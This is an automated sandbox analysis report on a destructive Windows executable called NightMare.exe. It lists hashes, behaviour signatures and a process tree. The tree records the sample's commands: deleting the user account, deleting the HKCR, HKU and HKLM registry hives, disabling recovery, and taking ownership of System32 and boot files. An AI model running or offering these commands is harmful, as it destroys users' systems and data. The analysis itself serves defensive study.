Analysis

  • max time kernel
    142s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-03-2024 20:38

General

  • Target

    MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe

  • Size

    42KB

  • MD5

    4c5dfe827dd3465bb97016996936fe38

  • SHA1

    010b868fe1a9e637912226a1eda1b73d901347dd

  • SHA256

    366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b

  • SHA512

    e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e

  • SSDEEP

    768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 18 IoCs
  • Modifies file permissions 1 TTPs 18 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Modifies Control Panel 14 IoCs
  • Modifies File Icons 3 IoCs
  • Modifies registry class 37 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe
    "C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"
    1⤵
    • UAC bypass
    • Disables RegEdit via registry modification
    • Modifies system executable filetype association
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies File Icons
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\net.exe
        net user Admin /delete
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /delete
          4⤵
          PID:2580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKCR
        3⤵
        PID:2804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3012
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKU
        3⤵
        PID:2816
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM
        3⤵
        • Modifies registry key
        PID:1956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\SysWOW64\ReAgentc.exe
        reagentc.exe /disable
        3⤵
        PID:2964
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2476
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2612
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:6912
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3284
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:7256
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4508
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
      2⤵
      PID:1604
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\taskmgr.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:6196
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
      2⤵
      PID:4676
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3480
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
      2⤵
      PID:5136
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI\BCD
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:5692
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
      2⤵
      PID:3456
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4340
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
      2⤵
      PID:7720
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
      2⤵
      PID:5904
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\servicing\TrustedInstaller.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7520
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
      2⤵
      PID:4140
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\System32\WUDFHost.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:5836
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5852
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4328
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4356
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:8996
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4608
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:4168
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:8280
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:6892
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:592
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:3916
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4036
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:5452
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:6432
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:7176
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1620

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt

    Filesize
    662B

    MD5
    21ad42bd4156f914d3a265823a1c269c

    SHA1
    4129bc994a0947b38e3bac2aeabc8e2fbdbd503f

    SHA256
    680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2

    SHA512
    7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a

  • memory/1948-0-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

    Filesize
    64KB

  • memory/1948-1-0x0000000074AA0000-0x000000007518E000-memory.dmp

    Filesize
    6.9MB

  • memory/1948-2-0x0000000004670000-0x00000000046B0000-memory.dmp

    Filesize
    256KB

  • memory/1948-20478-0x0000000074AA0000-0x000000007518E000-memory.dmp

    Filesize
    6.9MB

  • memory/1948-31137-0x0000000004670000-0x00000000046B0000-memory.dmp

    Filesize
    256KB

  • memory/1948-80006-0x0000000004670000-0x00000000046B0000-memory.dmp

    Filesize
    256KB

  • memory/1948-80027-0x0000000004670000-0x00000000046B0000-memory.dmp

    Filesize
    256KB